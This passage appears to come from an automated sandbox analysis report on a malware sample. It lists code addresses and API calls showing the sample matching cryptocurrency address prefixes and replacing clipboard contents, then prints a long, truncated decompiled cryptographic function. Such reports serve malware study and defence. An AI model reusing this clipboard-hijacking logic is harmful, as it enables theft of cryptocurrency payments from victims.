                                                                                  0x00403833
                                                                                  0x00403843
                                                                                  0x00403845
                                                                                  0x00403845
                                                                                  0x00403855
                                                                                  0x00403857
                                                                                  0x00403857
                                                                                  0x00403867
                                                                                  0x00403869
                                                                                  0x00403869
                                                                                  0x00403879
                                                                                  0x0040387b
                                                                                  0x0040387b
                                                                                  0x0040388b
                                                                                  0x0040388d
                                                                                  0x0040388d
                                                                                  0x0040389d
                                                                                  0x0040389f
                                                                                  0x0040389f
                                                                                  0x004038af
                                                                                  0x004038bb
                                                                                  0x004038c9
                                                                                  0x004038d2
                                                                                  0x004038dc
                                                                                  0x0040390b
                                                                                  0x00403902
                                                                                  0x00403902
                                                                                  0x00403902
                                                                                  0x004038dc
                                                                                  0x004038bb
                                                                                  0x0040391b
                                                                                  0x0040391d
                                                                                  0x0040391d
                                                                                  0x0040392d
                                                                                  0x0040392f
                                                                                  0x0040392f
                                                                                  0x0040393f
                                                                                  0x00403941
                                                                                  0x00403941
                                                                                  0x00403951
                                                                                  0x00403953
                                                                                  0x00403953
                                                                                  0x00403963
                                                                                  0x00403965
                                                                                  0x00403965
                                                                                  0x00403975
                                                                                  0x00403977
                                                                                  0x00403977
                                                                                  0x00403987
                                                                                  0x00403989
                                                                                  0x00403989
                                                                                  0x00403999
                                                                                  0x0040399b
                                                                                  0x0040399b
                                                                                  0x004039b3
                                                                                  0x004039b5
                                                                                  0x004039b5
                                                                                  0x004039cd
                                                                                  0x004039cf
                                                                                  0x004039cf
                                                                                  0x004039df
                                                                                  0x004039e1
                                                                                  0x004039e1
                                                                                  0x004039f9
                                                                                  0x004039fb
                                                                                  0x004039fb
                                                                                  0x00403a0b
                                                                                  0x00403a19
                                                                                  0x00403a19
                                                                                  0x00403a29
                                                                                  0x00403a2b
                                                                                  0x00403a2b
                                                                                  0x00403a3b
                                                                                  0x00403a41
                                                                                  0x00403a4c
                                                                                  0x00403a43
                                                                                  0x00403a43
                                                                                  0x00403a43
                                                                                  0x00403a41
                                                                                  0x00403a5c
                                                                                  0x00403a6f
                                                                                  0x00403a71
                                                                                  0x00403a71
                                                                                  0x00403a89
                                                                                  0x00403a8b
                                                                                  0x00403a8b
                                                                                  0x00403aa3
                                                                                  0x00403aa5
                                                                                  0x00403aa5
                                                                                  0x00403aa3
                                                                                  0x00403ab5
                                                                                  0x00403ab7
                                                                                  0x00403ab7
                                                                                  0x00403ac7
                                                                                  0x00403ac9
                                                                                  0x00403ac9
                                                                                  0x00403ad9
                                                                                  0x00403adb
                                                                                  0x00403adb
                                                                                  0x00403aec
                                                                                  0x00403af3
                                                                                  0x00403b07
                                                                                  0x00403b0e
                                                                                  0x00403b1a
                                                                                  0x00403b21
                                                                                  0x00403b32
                                                                                  0x00403b3e
                                                                                  0x00403b4e
                                                                                  0x00403b50
                                                                                  0x00403b5c
                                                                                  0x00403b62
                                                                                  0x00403b62
                                                                                  0x00403b4e
                                                                                  0x00403b21
                                                                                  0x00403b0e
                                                                                  0x00000000
                                                                                  0x00403b68
                                                                                  0x0040373b
                                                                                  0x0040374d
                                                                                  0x0040375e
                                                                                  0x00403794
                                                                                  0x0040379e
                                                                                  0x0040379f
                                                                                  0x004037a4
                                                                                  0x004037a9
                                                                                  0x004037c9
                                                                                  0x0040374a
                                                                                  0x00000000
                                                                                  0x0040374a
                                                                                  0x004037ab
                                                                                  0x004037b5
                                                                                  0x004037b6
                                                                                  0x004037bb
                                                                                  0x004037c0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040378d
                                                                                  0x00000000
                                                                                  0x0040378d
                                                                                  0x0040375e
                                                                                  0x00000000
                                                                                  0x0040374d

                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(00000000), ref: 00403498
                                                                                  • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 0040366F
                                                                                  • StrStrW.SHLWAPI(00000000,cosmos), ref: 0040369A
                                                                                  • StrStrW.SHLWAPI(00000000,addr), ref: 004036C2
                                                                                  • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 0040372D
                                                                                  • isalpha.NTDLL ref: 0040379F
                                                                                  • isdigit.NTDLL ref: 004037B6
                                                                                  • StrStrW.SHLWAPI(00000000,bitcoincash), ref: 004039AB
                                                                                  • StrStrW.SHLWAPI(00000000,cosmos), ref: 004039C5
                                                                                  • StrStrW.SHLWAPI(00000000,addr), ref: 004039F1
                                                                                  • StrStrW.SHLWAPI(00000000,bnb), ref: 00403A67
                                                                                  • StrStrW.SHLWAPI(00000000,band), ref: 00403A81
                                                                                  • StrStrW.SHLWAPI(00000000,bc1), ref: 00403A9B
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00403AE6
                                                                                  • GlobalAlloc.KERNEL32(00002002,-00000001), ref: 00403B01
                                                                                  • GlobalLock.KERNEL32 ref: 00403B14
                                                                                  • memcpy.NTDLL(00000000,00000000,-00000001), ref: 00403B32
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00403B3E
                                                                                  • OpenClipboard.USER32(00000000), ref: 00403B46
                                                                                  • EmptyClipboard.USER32 ref: 00403B50
                                                                                  • SetClipboardData.USER32 ref: 00403B5C
                                                                                  • CloseClipboard.USER32 ref: 00403B62
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Clipboard$Global$lstrlen$AllocCloseDataEmptyLockOpenUnlockisalphaisdigitmemcpy
                                                                                  • String ID: 8$addr$addr$band$bc1$bitcoincash$bitcoincash:$bitcoincash:$bnb$cosmos$cosmos
                                                                                  • API String ID: 2780752356-1510930353
                                                                                  • Opcode ID: 2c5db9e79411c39fb51cbdfc5cfebaa0b71a785cac5ae4d9f6a16cbf4b45c0c1
                                                                                  • Instruction ID: b665d6e5f15c84b57736a5ca98929a0149febd319ec054e6d13fe4cbe208dc28
                                                                                  • Opcode Fuzzy Hash: 2c5db9e79411c39fb51cbdfc5cfebaa0b71a785cac5ae4d9f6a16cbf4b45c0c1
                                                                                  • Instruction Fuzzy Hash: CE222B70A00218EACB24CF55C0845BE7FB6AF42756F60C46BE8856B390D7799FC1DB98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 100%
                                                                                  			E00406979() {
                                                                                  				signed int _t1392;
                                                                                  				signed int _t1393;
                                                                                  				signed int _t1394;
                                                                                  				signed int _t1398;
                                                                                  				signed int _t1408;
                                                                                  				intOrPtr _t1409;
                                                                                  				signed int _t1419;
                                                                                  				intOrPtr _t1420;
                                                                                  				signed int _t1430;
                                                                                  				intOrPtr _t1431;
                                                                                  				signed int _t1441;
                                                                                  				intOrPtr _t1442;
                                                                                  				signed int _t1452;
                                                                                  				intOrPtr _t1453;
                                                                                  				signed int _t1463;
                                                                                  				intOrPtr _t1464;
                                                                                  				signed int _t1474;
                                                                                  				intOrPtr _t1475;
                                                                                  				signed int _t1485;
                                                                                  				intOrPtr _t1486;
                                                                                  				signed int _t1496;
                                                                                  				intOrPtr _t1497;
                                                                                  				signed int _t1507;
                                                                                  				intOrPtr _t1508;
                                                                                  				signed int _t1518;
                                                                                  				intOrPtr _t1519;
                                                                                  				signed int _t1529;
                                                                                  				intOrPtr _t1530;
                                                                                  				signed int _t1540;
                                                                                  				intOrPtr _t1541;
                                                                                  				signed int _t1551;
                                                                                  				intOrPtr _t1552;
                                                                                  				signed int _t1562;
                                                                                  				intOrPtr _t1563;
                                                                                  				intOrPtr _t1572;
                                                                                  				intOrPtr _t1573;
                                                                                  				intOrPtr _t1574;
                                                                                  				signed int _t1575;
                                                                                  				signed int _t1581;
                                                                                  				signed int _t1582;
                                                                                  				signed int _t1583;
                                                                                  				signed int _t1584;
                                                                                  				signed int _t1588;
                                                                                  				signed int _t1591;
                                                                                  				signed int _t1592;
                                                                                  				signed int _t1593;
                                                                                  				signed int _t1594;
                                                                                  				signed int _t1598;
                                                                                  				signed int _t1601;
                                                                                  				signed int _t1602;
                                                                                  				signed int _t1603;
                                                                                  				signed int _t1604;
                                                                                  				signed int _t1608;
                                                                                  				signed int _t1611;
                                                                                  				signed int _t1612;
                                                                                  				signed int _t1613;
                                                                                  				signed int _t1614;
                                                                                  				signed int _t1618;
                                                                                  				signed int _t1621;
                                                                                  				signed int _t1622;
                                                                                  				signed int _t1623;
                                                                                  				signed int _t1624;
                                                                                  				signed int _t1628;
                                                                                  				signed int _t1631;
                                                                                  				signed int _t1632;
                                                                                  				signed int _t1633;
                                                                                  				signed int _t1634;
                                                                                  				signed int _t1638;
                                                                                  				signed int _t1641;
                                                                                  				signed int _t1642;
                                                                                  				signed int _t1643;
                                                                                  				signed int _t1644;
                                                                                  				signed int _t1648;
                                                                                  				signed int _t1651;
                                                                                  				signed int _t1652;
                                                                                  				signed int _t1653;
                                                                                  				signed int _t1654;
                                                                                  				signed int _t1658;
                                                                                  				signed int _t1661;
                                                                                  				signed int _t1662;
                                                                                  				signed int _t1663;
                                                                                  				signed int _t1664;
                                                                                  				signed int _t1668;
                                                                                  				signed int _t1671;
                                                                                  				signed int _t1672;
                                                                                  				signed int _t1673;
                                                                                  				signed int _t1674;
                                                                                  				signed int _t1678;
                                                                                  				signed int _t1681;
                                                                                  				signed int _t1682;
                                                                                  				signed int _t1683;
                                                                                  				signed int _t1684;
                                                                                  				signed int _t1688;
                                                                                  				signed int _t1691;
                                                                                  				signed int _t1692;
                                                                                  				signed int _t1693;
                                                                                  				signed int _t1694;
                                                                                  				signed int _t1698;
                                                                                  				signed int _t1701;
                                                                                  				signed int _t1702;
                                                                                  				signed int _t1703;
                                                                                  				signed int _t1704;
                                                                                  				signed int _t1708;
                                                                                  				signed int _t1711;
                                                                                  				signed int _t1712;
                                                                                  				signed int _t1713;
                                                                                  				signed int _t1714;
                                                                                  				signed int _t1718;
                                                                                  				signed int _t1721;
                                                                                  				signed int _t1722;
                                                                                  				signed int _t1723;
                                                                                  				signed int _t1724;
                                                                                  				signed int _t1728;
                                                                                  				signed int _t1731;
                                                                                  				signed int _t1743;
                                                                                  				intOrPtr _t1744;
                                                                                  				intOrPtr _t1750;
                                                                                  				intOrPtr _t1751;
                                                                                  				intOrPtr _t1752;
                                                                                  				signed int _t1753;
                                                                                  				intOrPtr _t1762;
                                                                                  				intOrPtr _t1763;
                                                                                  				intOrPtr _t1764;
                                                                                  				signed int _t1765;
                                                                                  				intOrPtr _t1774;
                                                                                  				intOrPtr _t1775;
                                                                                  				intOrPtr _t1776;
                                                                                  				signed int _t1777;
                                                                                  				intOrPtr _t1786;
                                                                                  				intOrPtr _t1787;
                                                                                  				intOrPtr _t1788;
                                                                                  				signed int _t1789;
                                                                                  				intOrPtr _t1798;
                                                                                  				intOrPtr _t1799;
                                                                                  				intOrPtr _t1800;
                                                                                  				signed int _t1801;
                                                                                  				intOrPtr _t1810;
                                                                                  				intOrPtr _t1811;
                                                                                  				intOrPtr _t1812;
                                                                                  				signed int _t1813;
                                                                                  				intOrPtr _t1822;
                                                                                  				intOrPtr _t1823;
                                                                                  				intOrPtr _t1824;
                                                                                  				signed int _t1825;
                                                                                  				intOrPtr _t1834;
                                                                                  				intOrPtr _t1835;
                                                                                  				intOrPtr _t1836;
                                                                                  				signed int _t1837;
                                                                                  				intOrPtr _t1846;
                                                                                  				intOrPtr _t1847;
                                                                                  				intOrPtr _t1848;
                                                                                  				signed int _t1849;
                                                                                  				intOrPtr _t1858;
                                                                                  				intOrPtr _t1859;
                                                                                  				intOrPtr _t1860;
                                                                                  				signed int _t1861;
                                                                                  				intOrPtr _t1870;
                                                                                  				intOrPtr _t1871;
                                                                                  				intOrPtr _t1872;
                                                                                  				signed int _t1873;
                                                                                  				intOrPtr _t1882;
                                                                                  				intOrPtr _t1883;
                                                                                  				intOrPtr _t1884;
                                                                                  				signed int _t1885;
                                                                                  				intOrPtr _t1894;
                                                                                  				intOrPtr _t1895;
                                                                                  				intOrPtr _t1896;
                                                                                  				signed int _t1897;
                                                                                  				intOrPtr _t1906;
                                                                                  				intOrPtr _t1907;
                                                                                  				intOrPtr _t1908;
                                                                                  				signed int _t1909;
                                                                                  				intOrPtr _t1918;
                                                                                  				intOrPtr _t1919;
                                                                                  				intOrPtr _t1920;
                                                                                  				signed int _t1921;
                                                                                  				intOrPtr _t2038;
                                                                                  				intOrPtr _t2039;
                                                                                  				intOrPtr _t2040;
                                                                                  				intOrPtr _t2045;
                                                                                  				intOrPtr _t2046;
                                                                                  				intOrPtr _t2047;
                                                                                  				intOrPtr _t2052;
                                                                                  				intOrPtr _t2053;
                                                                                  				intOrPtr _t2054;
                                                                                  				intOrPtr _t2059;
                                                                                  				intOrPtr _t2060;
                                                                                  				intOrPtr _t2061;
                                                                                  				intOrPtr _t2066;
                                                                                  				intOrPtr _t2067;
                                                                                  				intOrPtr _t2068;
                                                                                  				intOrPtr _t2073;
                                                                                  				intOrPtr _t2074;
                                                                                  				intOrPtr _t2075;
                                                                                  				intOrPtr _t2080;
                                                                                  				intOrPtr _t2081;
                                                                                  				intOrPtr _t2082;
                                                                                  				intOrPtr _t2087;
                                                                                  				intOrPtr _t2088;
                                                                                  				intOrPtr _t2089;
                                                                                  				intOrPtr _t2094;
                                                                                  				intOrPtr _t2095;
                                                                                  				intOrPtr _t2096;
                                                                                  				intOrPtr _t2101;
                                                                                  				intOrPtr _t2102;
                                                                                  				intOrPtr _t2103;
                                                                                  				intOrPtr _t2108;
                                                                                  				intOrPtr _t2109;
                                                                                  				intOrPtr _t2110;
                                                                                  				intOrPtr _t2115;
                                                                                  				intOrPtr _t2116;
                                                                                  				intOrPtr _t2117;
                                                                                  				intOrPtr _t2122;
                                                                                  				intOrPtr _t2123;
                                                                                  				intOrPtr _t2124;
                                                                                  				intOrPtr _t2129;
                                                                                  				intOrPtr _t2130;
                                                                                  				intOrPtr _t2131;
                                                                                  				intOrPtr _t2136;
                                                                                  				intOrPtr _t2137;
                                                                                  				intOrPtr _t2138;
                                                                                  				intOrPtr _t2143;
                                                                                  				intOrPtr _t2144;
                                                                                  				intOrPtr _t2145;
                                                                                  				void* _t2149;
                                                                                  
                                                                                  				L0:
                                                                                  				while(1) {
                                                                                  					L0:
                                                                                  					 *((intOrPtr*)(_t2149 - 0x1c)) =  *((intOrPtr*)(_t2149 - 0x1c)) + 0x10;
                                                                                  					L1:
                                                                                  					_t1391 =  *(_t2149 + 0xc) << 4;
                                                                                  					if( *((intOrPtr*)(_t2149 - 0x1c)) < _t1391) {
                                                                                  						L2:
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                  						_t1392 =  *(_t2149 - 0xc);
                                                                                  						_t1572 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1572 + _t1392 * 8 - 0x2c8);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1572 + _t1392 * 8 - 0x2c4);
                                                                                  						_t1393 =  *(_t2149 - 0xc);
                                                                                  						_t1573 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1573 + _t1393 * 8 - 0x88);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1573 + _t1393 * 8 - 0x84);
                                                                                  						_t1394 =  *(_t2149 - 0xc);
                                                                                  						_t1574 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1743 =  *(_t2149 - 0xc);
                                                                                  						_t2038 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1574 + _t1394 * 8 - 0x90) &  *(_t2038 + _t1743 * 8 - 0xa8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1574 + _t1394 * 8 - 0x8c) &  *(_t2038 + _t1743 * 8 - 0xa4) ^  *(_t2149 - 4);
                                                                                  						_t1575 =  *(_t2149 - 0xc);
                                                                                  						_t1744 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1398 =  *(_t2149 - 0xc);
                                                                                  						_t2039 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1744 + _t1575 * 8 - 0xf8) &  *(_t2039 + _t1398 * 8 - 0x218) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1744 + _t1575 * 8 - 0xf4) &  *(_t2039 + _t1398 * 8 - 0x214) ^  *(_t2149 - 4);
                                                                                  						L0040F198();
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						L0040F19E();
                                                                                  						_t1581 =  *(_t2149 - 0xc);
                                                                                  						_t2040 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2040 + _t1581 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2040 + 4 + _t1581 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                  						_t1582 =  *(_t2149 - 0xc);
                                                                                  						_t1750 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1750 + _t1582 * 8 - 0x2c0);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1750 + _t1582 * 8 - 0x2bc);
                                                                                  						_t1583 =  *(_t2149 - 0xc);
                                                                                  						_t1751 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1751 + _t1583 * 8 - 0x80);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1751 + _t1583 * 8 - 0x7c);
                                                                                  						_t1584 =  *(_t2149 - 0xc);
                                                                                  						_t1752 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1408 =  *(_t2149 - 0xc);
                                                                                  						_t2045 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1752 + _t1584 * 8 - 0x88) &  *(_t2045 + _t1408 * 8 - 0xa0) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1752 + _t1584 * 8 - 0x84) &  *(_t2045 + _t1408 * 8 - 0x9c) ^  *(_t2149 - 4);
                                                                                  						_t1753 =  *(_t2149 - 0xc);
                                                                                  						_t1409 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1588 =  *(_t2149 - 0xc);
                                                                                  						_t2046 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1409 + _t1753 * 8 - 0xf0) &  *(_t2046 + _t1588 * 8 - 0x210) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1409 + _t1753 * 8 - 0xec) &  *(_t2046 + _t1588 * 8 - 0x20c) ^  *(_t2149 - 4);
                                                                                  						L0040F198();
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						L0040F19E();
                                                                                  						_t1591 =  *(_t2149 - 0xc);
                                                                                  						_t2047 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2047 + 8 + _t1591 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2047 + 0xc + _t1591 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                  						_t1592 =  *(_t2149 - 0xc);
                                                                                  						_t1762 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1762 + _t1592 * 8 - 0x2b8);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1762 + _t1592 * 8 - 0x2b4);
                                                                                  						_t1593 =  *(_t2149 - 0xc);
                                                                                  						_t1763 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1763 + _t1593 * 8 - 0x78);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1763 + _t1593 * 8 - 0x74);
                                                                                  						_t1594 =  *(_t2149 - 0xc);
                                                                                  						_t1764 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1419 =  *(_t2149 - 0xc);
                                                                                  						_t2052 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1764 + _t1594 * 8 - 0x80) &  *(_t2052 + _t1419 * 8 - 0x98) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1764 + _t1594 * 8 - 0x7c) &  *(_t2052 + _t1419 * 8 - 0x94) ^  *(_t2149 - 4);
                                                                                  						_t1765 =  *(_t2149 - 0xc);
                                                                                  						_t1420 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1598 =  *(_t2149 - 0xc);
                                                                                  						_t2053 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1420 + _t1765 * 8 - 0xe8) &  *(_t2053 + _t1598 * 8 - 0x208) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1420 + _t1765 * 8 - 0xe4) &  *(_t2053 + _t1598 * 8 - 0x204) ^  *(_t2149 - 4);
                                                                                  						L0040F198();
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						L0040F19E();
                                                                                  						_t1601 =  *(_t2149 - 0xc);
                                                                                  						_t2054 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2054 + 0x10 + _t1601 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2054 + 0x14 + _t1601 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                  						_t1602 =  *(_t2149 - 0xc);
                                                                                  						_t1774 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1774 + _t1602 * 8 - 0x2b0);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1774 + _t1602 * 8 - 0x2ac);
                                                                                  						_t1603 =  *(_t2149 - 0xc);
                                                                                  						_t1775 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1775 + _t1603 * 8 - 0x70);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1775 + _t1603 * 8 - 0x6c);
                                                                                  						_t1604 =  *(_t2149 - 0xc);
                                                                                  						_t1776 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1430 =  *(_t2149 - 0xc);
                                                                                  						_t2059 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1776 + _t1604 * 8 - 0x78) &  *(_t2059 + _t1430 * 8 - 0x90) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1776 + _t1604 * 8 - 0x74) &  *(_t2059 + _t1430 * 8 - 0x8c) ^  *(_t2149 - 4);
                                                                                  						_t1777 =  *(_t2149 - 0xc);
                                                                                  						_t1431 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1608 =  *(_t2149 - 0xc);
                                                                                  						_t2060 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1431 + _t1777 * 8 - 0xe0) &  *(_t2060 + _t1608 * 8 - 0x200) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1431 + _t1777 * 8 - 0xdc) &  *(_t2060 + _t1608 * 8 - 0x1fc) ^  *(_t2149 - 4);
                                                                                  						L0040F198();
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						L0040F19E();
                                                                                  						_t1611 =  *(_t2149 - 0xc);
                                                                                  						_t2061 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2061 + 0x18 + _t1611 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2061 + 0x1c + _t1611 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                  						_t1612 =  *(_t2149 - 0xc);
                                                                                  						_t1786 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1786 + _t1612 * 8 - 0x2a8);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1786 + _t1612 * 8 - 0x2a4);
                                                                                  						_t1613 =  *(_t2149 - 0xc);
                                                                                  						_t1787 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1787 + _t1613 * 8 - 0x68);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1787 + _t1613 * 8 - 0x64);
                                                                                  						_t1614 =  *(_t2149 - 0xc);
                                                                                  						_t1788 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1441 =  *(_t2149 - 0xc);
                                                                                  						_t2066 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1788 + _t1614 * 8 - 0x70) &  *(_t2066 + _t1441 * 8 - 0x88) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1788 + _t1614 * 8 - 0x6c) &  *(_t2066 + _t1441 * 8 - 0x84) ^  *(_t2149 - 4);
                                                                                  						_t1789 =  *(_t2149 - 0xc);
                                                                                  						_t1442 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1618 =  *(_t2149 - 0xc);
                                                                                  						_t2067 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1442 + _t1789 * 8 - 0xd8) &  *(_t2067 + _t1618 * 8 - 0x1f8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1442 + _t1789 * 8 - 0xd4) &  *(_t2067 + _t1618 * 8 - 0x1f4) ^  *(_t2149 - 4);
                                                                                  						L0040F198();
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						L0040F19E();
                                                                                  						_t1621 =  *(_t2149 - 0xc);
                                                                                  						_t2068 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2068 + 0x20 + _t1621 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2068 + 0x24 + _t1621 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                  						_t1622 =  *(_t2149 - 0xc);
                                                                                  						_t1798 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1798 + _t1622 * 8 - 0x2a0);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1798 + _t1622 * 8 - 0x29c);
                                                                                  						_t1623 =  *(_t2149 - 0xc);
                                                                                  						_t1799 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1799 + _t1623 * 8 - 0x60);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1799 + _t1623 * 8 - 0x5c);
                                                                                  						_t1624 =  *(_t2149 - 0xc);
                                                                                  						_t1800 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1452 =  *(_t2149 - 0xc);
                                                                                  						_t2073 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1800 + _t1624 * 8 - 0x68) &  *(_t2073 + _t1452 * 8 - 0x80) ^  *(_t2149 - 8);
